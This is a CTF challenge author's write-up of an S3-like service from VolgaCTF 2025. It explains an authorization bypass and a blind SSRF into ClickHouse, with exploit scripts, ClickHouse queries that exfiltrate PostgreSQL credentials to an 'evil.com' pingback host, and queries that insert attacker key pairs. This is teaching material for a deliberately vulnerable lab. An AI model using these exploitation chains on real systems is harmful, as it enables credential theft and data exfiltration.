VolgaCTF 2025: s3waaas writeup

# Intro

For this year’s VolgaCTF, I’ve made a toy S3 service in collaboration with WGH, the Bushwhackers CTF team captain. The service was written in Rust and used the s3s library for request parsing. It used a simple filesystem backend, PostgreSQL for storing bucket metadata, key pairs and access rights, and had a simple web frontend written in Flask for user registration and key pair management. The original idea was to introduce CTF teams to ClickHouse post-exploitation, so I decided to implement an “AWS-like” analytics feature to justify ClickHouse usage (it is an analytical database, after all). The idea of creating a toy S3 service came to me because I closely interact with a similar service at work. The service code can be downloaded here.

If you do not know what an attack-defense CTF is, you may have trouble understanding what is going on. This page might be your entry point to this wonderful world.

# API notes

To make the service structure easier to understand, here are a few words about the analytics feature. An example PutBucketAnalyticsConfiguration request looks like this:

Request:
PUT /?analytics&id=report1 HTTP/1.1
Host: examplebucket.s3.<Region>.amazonaws.com
Date: Mon, 31 Oct 2016 12:00:00 GMT
Authorization: authorization string
Content-Length: length
 
<?xml version="1.0" encoding="UTF-8"?>
<AnalyticsConfiguration xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
  <Id>report1</Id>
  <Filter>
    <And>
      <Prefix>images/</Prefix>
      <Tag>
        <Key>dog</Key>
        <Value>corgi</Value>
      </Tag>
    </And>
  </Filter>
  <StorageClassAnalysis>
    <DataExport>
      <OutputSchemaVersion>V_1</OutputSchemaVersion>
      <Destination>
        <S3BucketDestination>
          <Format>CSV</Format>
          <BucketAccountId>123456789012</BucketAccountId>
          <Bucket>arn:aws:s3:::destination-bucket</Bucket>
          <Prefix>destination-prefix</Prefix>
        </S3BucketDestination>
      </Destination>
    </DataExport>
  </StorageClassAnalysis>
</AnalyticsConfiguration>

In AWS S3, after this request some statistics on items matching the <Filter> would be regularly written to the bucket configured via the AWS ARN in the <Bucket> tag. Note that Amazon exports different statistics; my toy service only exported request counts. Another difference is that AWS performs this export periodically, whereas the A/D service performed it just once to avoid DoS.
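
For reference, the same configuration can be submitted programmatically with boto3. The sketch below uses placeholder credentials and endpoint values; only the structure of the call matters here:

import boto3

# A sketch of issuing PutBucketAnalyticsConfiguration via boto3.
# The endpoint, credentials and bucket names are placeholders.
s3 = boto3.client(
    "s3",
    endpoint_url="http://s3-server:9001",
    aws_access_key_id="<access_key_id>",
    aws_secret_access_key="<secret_key>",
)
s3.put_bucket_analytics_configuration(
    Bucket="examplebucket",
    Id="report1",
    AnalyticsConfiguration={
        "Id": "report1",
        "Filter": {
            "And": {
                "Prefix": "images/",
                "Tags": [{"Key": "dog", "Value": "corgi"}],
            }
        },
        "StorageClassAnalysis": {
            "DataExport": {
                "OutputSchemaVersion": "V_1",
                "Destination": {
                    "S3BucketDestination": {
                        "Format": "CSV",
                        "BucketAccountId": "123456789012",
                        "Bucket": "arn:aws:s3:::destination-bucket",
                        "Prefix": "destination-prefix",
                    }
                },
            }
        },
    },
)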

# Service structure

The service consisted of the following components:

  1. The main S3 service, written in Rust. This part handled all S3 operations. It used PostgreSQL for bucket metadata storage and access checks. Also, for each successful request a row was written to ClickHouse.

  2. PostgreSQL database, accessible without a password, with POSTGRES_HOST_AUTH_METHOD=trust.

  3. ClickHouse server, with several restricted users.

  4. Analytics job, which checked for recently created analytics configs, then for each found config performed the following operations (a sketch of this flow follows the list):

    1. A check for existence of the configured bucket via the ListObjects operation
    2. A ClickHouse query to count the bucket access stats
    3. A PutObject S3 operation to create an analytics CSV file in a configured bucket
    4. Deletion of the analytics config

    For these internal requests, authorization for the S3 operations involved (ListObjects, PutObject) was bypassed via a special header. Nginx stripped that header from external traffic, so it could not be leveraged for exploitation.

  5. A cleanup job to remove all old users, buckets and other artifacts

  6. A simple web app for user registration and key management (should not contain vulnerabilities)

  7. Nginx reverse proxy for routing requests and filtering the internal header
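
To make the analytics flow from item 4 concrete, here is a rough Python sketch of the job loop; all function names are hypothetical stand-ins for the real Rust implementation:

# A rough sketch of the analytics job described in item 4 above.
# fetch_recent_configs, internal_list_objects, clickhouse_request_counts,
# internal_put_object and delete_config are hypothetical stand-ins.
def run_analytics_job(fetch_recent_configs, internal_list_objects,
                      clickhouse_request_counts, internal_put_object,
                      delete_config):
    for cfg in fetch_recent_configs():
        # 1. Check that the configured destination bucket exists (ListObjects)
        if internal_list_objects(cfg.destination_bucket) is None:
            continue
        # 2. Count the bucket access stats in ClickHouse
        rows = clickhouse_request_counts(cfg.bucket)
        # 3. Write the analytics CSV into the destination bucket (PutObject)
        csv_body = "\n".join(",".join(map(str, row)) for row in rows)
        internal_put_object(cfg.destination_bucket, cfg.prefix + "report.csv", csv_body)
        # 4. Delete the config so the export happens only once
        delete_config(cfg)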

The checker verified the multipart upload functionality and that the analytics export worked.

# Vulnerabilities

The service came with two intended vulnerabilities: an authorization bypass during a limited time window and a blind SSRF. While the vulnerabilities could be considered easy to spot, the auth bypass was intentionally made unreliable, and the SSRF exploitation strategy was less obvious than the vulnerability itself.

# Auth bypass via multipart.uploads

The authorization bypass-related code is in the meta_storage.rs file:

pub async fn has_roles_for_bucket(
    &self,
    access_key_id: &str,
    user_id: &str,
    bucket: &str,
    access_key_roles: &Vec<String>,
    required_roles: &Vec<&str>,
) -> Result<bool, sqlx::Error> {
    let bucket_owner =
        sqlx::query_as::<_, (String,)>("SELECT owner_id FROM buckets WHERE name = $1")
            .bind(bucket)
            .fetch_optional(&self.pool)
            .await?;
    if let Some((owner_id,)) = bucket_owner {
        if owner_id != user_id {
            return Ok(false);
        }
    } else {
        return Ok(true);
    }
    ...
}

This means there is no authorization check for directories that exist on the filesystem but are not registered in the database. The files storage backend in backend.rs uses the multipart.uploads directory for storing incomplete multipart uploads (for example, put_multipart_part writes into it). Since this directory is not registered as a bucket, any user can access it.

pub async fn put_multipart_part(
    &self,
    _bucket: &str,
    _key: &str,
    upload_id: &str,
    part_number: i32,
    mut body: s3s::dto::StreamingBlob,
) -> io::Result<(String, u64)> {
    use futures::StreamExt;
    use sha2::{Digest, Sha256};
    use tokio::io::AsyncWriteExt; // write_all/flush on tokio::fs::File come from this trait

    let multipart_dir = self.root.join(format!("multipart.uploads/{}", upload_id));

    let part_file = multipart_dir.join(format!("part-{:05}", part_number));
    let mut file = tokio::fs::File::create(&part_file).await?;

    let mut hasher = Sha256::new();
    let mut total_size = 0u64;

    while let Some(chunk) = body.next().await {
        let bytes = chunk.map_err(|e| io::Error::new(io::ErrorKind::Other, e))?;
        hasher.update(&bytes);
        total_size += bytes.len() as u64;
        file.write_all(&bytes).await?;
    }

    file.flush().await?;

    let etag = format!("{:x}", hasher.finalize());
    Ok((etag, total_size))
}

The check system uploads the flags as multipart S3 objects and intentionally pauses for one second before calling CompleteMultipartUpload. During this exploitation window it is possible to steal the part containing the flag from any registered user. However, since the upload ID (and therefore the directory name) is not known in advance, the attacker first has to list the multipart.uploads bucket and only then call GetObject.

def exploit():
    # Register a fresh user and create an access/secret key pair
    ak, sk = _register_and_create_keys(ENDPOINT)
    print(ak, sk)
    s3 = _get_s3_client(ENDPOINT, ak, sk)
    # multipart.uploads is not registered as a bucket, so the broken
    # authorization check lets any user list it
    objects = s3.list_objects(Bucket="multipart.uploads")
    print(objects)
    for obj in objects["Contents"]:
        try:
            # Grab the first part of every in-flight upload; flag-bearing parts
            # exist only during the checker's one-second pause
            uploads = s3.get_object(Bucket="multipart.uploads", Key=obj["Key"].split("/")[-1] + "/part-00001")
            print(uploads["Body"].read())
        except Exception as e:
            print(e)

Due to the short exploitation window and the possibility of cluttering the multipart.uploads directory with unfinished uploads, this exploit is unreliable, and that unreliability is intentional. While shipping several vulnerabilities is good A/D CTF practice, if the first, easier vuln is reliable enough, auditing the service further and exploiting the harder one is usually not worth the effort in terms of CTF points.

# SSRF exploitation via ClickHouse

The second vulnerability is easy to find: the analytics job interprets the AWS region field of the ARN as the endpoint hostname (which is not how real ARNs work).

struct AwsArn {
    region: String,
    port: String,
    resource_id: Option<String>,
}

impl AwsArn {
    fn endpoint(&self) -> String {
        format!("http://{}:{}", self.region, self.port)
    }
}
...
async fn list_objects(
    &self,
    bucket: &str,
    arn: &AwsArn,
) -> Result<Vec<String>, Box<dyn std::error::Error>> {
    let url = format!("{}/{}", arn.endpoint(), bucket);
    ...
}

So with an ARN like arn:aws:s3:<hostname>:<port>:a we can make the analytics job send requests to an arbitrary host and port. However, this is a blind SSRF, so it is not immediately obvious what to do next; remember that the flags are stored only as objects in buckets.
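
To be explicit about the primitive: whatever goes into the region and port fields of the Bucket ARN becomes the host and port the analytics job connects to. A tiny helper to build such an ARN might look like this (the host and port below are placeholders):

def ssrf_arn(host: str, port: int, resource: str = "a") -> str:
    # The analytics job parses this as arn:aws:s3:<region>:<port>:<resource>
    # and builds its request URLs on top of http://<region>:<port>.
    return f"arn:aws:s3:{host}:{port}:{resource}"

print(ssrf_arn("attacker.example.com", 8080))
# -> arn:aws:s3:attacker.example.com:8080:a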

Several facts about ClickHouse:

  1. It has many weird features, including remote table functions such as url(), postgresql() and s3(), which let a query talk to external services.

  2. ClickHouse users can be configured with the readonly setting: readonly=1 prohibits any mutations of the database, while readonly=2 also allows creating temporary tables, which are required for those remote table functions. Fully unrestricted users (readonly=0) can change server settings via queries and cause a DoS, which is undesirable.

  3. Queries sent over HTTP GET are supposed to be forced into readonly mode, but for some reason they are not: the permissions preconfigured for the user (for example, in the config file) are what actually applies, and the implicit GET restriction does not override them.

  4. By default, ClickHouse ships with the user “default” and an empty password. In this service there are also several users with hardcoded passwords, which can be found in the users.xml config file. If no user is specified in a request, the default user is used.
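
Facts 3 and 4 combined mean that a single unauthenticated GET request is enough to run a query. If you spin the service up locally, this is easy to verify (clickhouse:8123 is the ClickHouse host inside the service network; from the game network it is only reachable through the SSRF):

import requests

# Run a query over the ClickHouse HTTP interface via GET. No password is
# supplied, so the "default" user with an empty password is used.
resp = requests.get(
    "http://clickhouse:8123/",
    params={"query": "SELECT version()"},
)
print(resp.status_code, resp.text)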

To exploit this vulnerability, a team has to leverage the blind SSRF and combine several of these remote functions. For example, it is possible to steal access key pairs with the following query:

WITH hui AS (
    select access_key_id, secret_key from postgresql('postgres:5432', 's3auth', 'access_keys', 's3', 's3pass')
) INSERT INTO
    FUNCTION url('http://attacker-pingback-endpoint.evil.com', 'CSV', 'column1 String, column2 String')
    SELECT * FROM hui;

where attacker-pingback-endpoint.evil.com is an attacker-controlled HTTP endpoint where the stolen credentials will be sent.
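
On the attacker's side, any plain HTTP listener works for catching the exfiltrated rows; ClickHouse delivers the selected data in the request body. A minimal sketch (it assumes a Content-Length header is present; the port is arbitrary and must match the pingback endpoint used in the query):

from http.server import BaseHTTPRequestHandler, HTTPServer

class Pingback(BaseHTTPRequestHandler):
    def _dump(self):
        # Print whatever ClickHouse sends us; the CSV rows arrive in the body
        length = int(self.headers.get("Content-Length", 0))
        body = self.rfile.read(length) if length else b""
        print(self.command, self.path, body.decode(errors="replace"))
        self.send_response(200)
        self.end_headers()

    do_GET = do_POST = do_PUT = _dump

if __name__ == "__main__":
    HTTPServer(("0.0.0.0", 8000), Pingback).serve_forever()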

To trigger the SSRF, the following code might be used:

def exploit(target_endpoint, target_port, pb_host, pb_port):
    ak, sk = _register_and_create_keys(target_endpoint, target_port)
    print(ak, sk)
    s3 = _get_s3_client(target_endpoint, target_port, ak, sk)
    bucket = get_random_message(size=12).lower()
    s3.create_bucket(Bucket=bucket)
    pingback_endpoint = urllib.parse.quote(f'{pb_host}:{pb_port}')
    analytics_cfg = {
        "Id": get_random_message(size=12),
        "StorageClassAnalysis": {
            "DataExport": {
                "OutputSchemaVersion": "V_1",
                "Destination": {
                    "S3BucketDestination": {
                        "Format": "CSV",
                        "Bucket": f"arn:aws:s3:clickhouse:8123:?default_format=JSONEachRow&user=default&query=WITH%20hui%20AS%20(%20select%20access_key_id,%20secret_key,%20created_at%20from%20postgresql('postgres%3a5432',%0A's3auth',%20'access_keys',%20's3',%20's3pass'))%20INSERT%20INTO%20FUNCTION%0Aurl('http%3a//{pingback_endpoint}',%20'CSV',%20'column1%20String,%20column2%20String,%20column3%20String')%20SELECT%20*%0AFROM%20hui%20ORDER%20BY%20created_at%20DESC%20LIMIT%205",
                        "Prefix": "analytics/",
                    }
                },
            },
        },
    }
    s3.put_bucket_analytics_configuration(Bucket=bucket, Id=get_random_message(size=12), AnalyticsConfiguration=analytics_cfg)

Notice that the query requires ClickHouse credentials, so either the default user (empty password) or one of the other hardcoded users can be used. Also, strong PostgreSQL authentication would make the vulnerability impossible to exploit; however, the database was deliberately configured with POSTGRES_HOST_AUTH_METHOD=trust, so that an accidental change of the default PostgreSQL password would not close this hole.

However, this exploitation method is not optimal: the stolen credentials still have to be used afterwards to fetch the flags, which costs additional HTTP requests. Fortunately, since ClickHouse also supports s3 table functions, it is possible to write a more complex query that reads the flags directly! The part of the query that selects the flag values may look like this (this variant targets the flags of the last four rounds; keep in mind that the data may get clobbered by team registrations without flags, so attack data can be used to pick out the flag-bearing users, and the result of this query still has to be exfiltrated to the attacker's server the same way as in the query above):

WITH
    buckets AS (SELECT name, owner_id FROM postgresql('postgres:5432', 's3auth', 'buckets', 's3', 's3pass')),
    ac AS (SELECT * FROM postgresql('postgres:5432', 's3auth', 'access_keys', 's3', 's3pass')),
    keys_and_bucket_name AS (SELECT name, access_key_id, secret_key FROM ac JOIN buckets ON buckets.owner_id = ac.user_id),
    (SELECT access_key_id FROM keys_and_bucket_name LIMIT 1) AS access_key_id_1,
    (SELECT secret_key FROM keys_and_bucket_name LIMIT 1) AS secret_access_key_1,
    (SELECT name FROM keys_and_bucket_name LIMIT 1) AS bucket_name_1,
    (SELECT access_key_id FROM keys_and_bucket_name LIMIT 1 OFFSET 1) AS access_key_id_2,
    (SELECT secret_key FROM keys_and_bucket_name LIMIT 1 OFFSET 1) AS secret_access_key_2,
    (SELECT name FROM keys_and_bucket_name LIMIT 1 OFFSET 1) AS bucket_name_2,
    (SELECT access_key_id FROM keys_and_bucket_name LIMIT 1 OFFSET 2) AS access_key_id_3,
    (SELECT secret_key FROM keys_and_bucket_name LIMIT 1 OFFSET 2) AS secret_access_key_3,
    (SELECT name FROM keys_and_bucket_name LIMIT 1 OFFSET 2) AS bucket_name_3,
    (SELECT access_key_id FROM keys_and_bucket_name LIMIT 1 OFFSET 3) AS access_key_id_4,
    (SELECT secret_key FROM keys_and_bucket_name LIMIT 1 OFFSET 3) AS secret_access_key_4,
    (SELECT name FROM keys_and_bucket_name LIMIT 1 OFFSET 3) AS bucket_name_4
SELECT * FROM s3(concat('http://s3-server:9001/', bucket_name_1, '/*'), access_key_id_1, secret_access_key_1, 'CSV', 'hui String')
UNION ALL
SELECT * FROM s3(concat('http://s3-server:9001/', bucket_name_2, '/*'), access_key_id_2, secret_access_key_2, 'CSV', 'hui String')
UNION ALL
SELECT * FROM s3(concat('http://s3-server:9001/', bucket_name_3, '/*'), access_key_id_3, secret_access_key_3, 'CSV', 'hui String')
UNION ALL
SELECT * FROM s3(concat('http://s3-server:9001/', bucket_name_4, '/*'), access_key_id_4, secret_access_key_4, 'CSV', 'hui String')
;
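
As with the credential-stealing query, the result still has to leave the network via INSERT INTO FUNCTION url(...), and the whole thing then has to be percent-encoded into the resource part of the ARN, exactly like in the trigger exploit above. A sketch of that last step (flag_query stands in for the full query):

import urllib.parse

# Sketch: percent-encode an arbitrary ClickHouse query into the ARN consumed
# by the analytics job. safe="" also encodes ':' characters, which would
# otherwise break the colon-delimited ARN.
flag_query = "SELECT 1"  # placeholder for the full url()-wrapped flag query
arn = (
    "arn:aws:s3:clickhouse:8123:"
    "?user=default&query=" + urllib.parse.quote(flag_query, safe="")
)
print(arn)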

# LLM notes

The service was pretty tough to vibe-hack because it is larger than the average A/D CTF service. My experiments showed that Cursor with GPT-5 (Thinking) finds both vulnerable code paths but fails to figure out how to exploit either vulnerability, as intended. I do think that with some hints the agent would manage to exploit the first, auth-bypass vulnerability. In fact, the task was written with LLM usage in mind, to speed up the code audit.

# Conclusion

The service was first-blooded by the LCD team on the 135th round of the game (roughly four and a half hours after the start). They exploited the ClickHouse SSRF, but instead of using pingbacks they inserted a known key pair, like this:

INSERT INTO TABLE FUNCTION
    postgresql('postgres','s3auth','access_keys','s3','','public')
    (access_key_id, secret_key, user_id) VALUES
    ('<access_key>', '<secret_key>', (
        SELECT owner_id FROM postgresql('postgres','s3auth','buckets','s3','', 'public')
        WHERE name = '<known_bucket_name_from_attack_data>'
    ))

and then added a role for the key:

INSERT INTO TABLE FUNCTION
    postgresql('postgres','s3auth','access_key_roles','s3','','public')
    (access_key_id, access_key_role) VALUES
    ('<access_key>', 'view')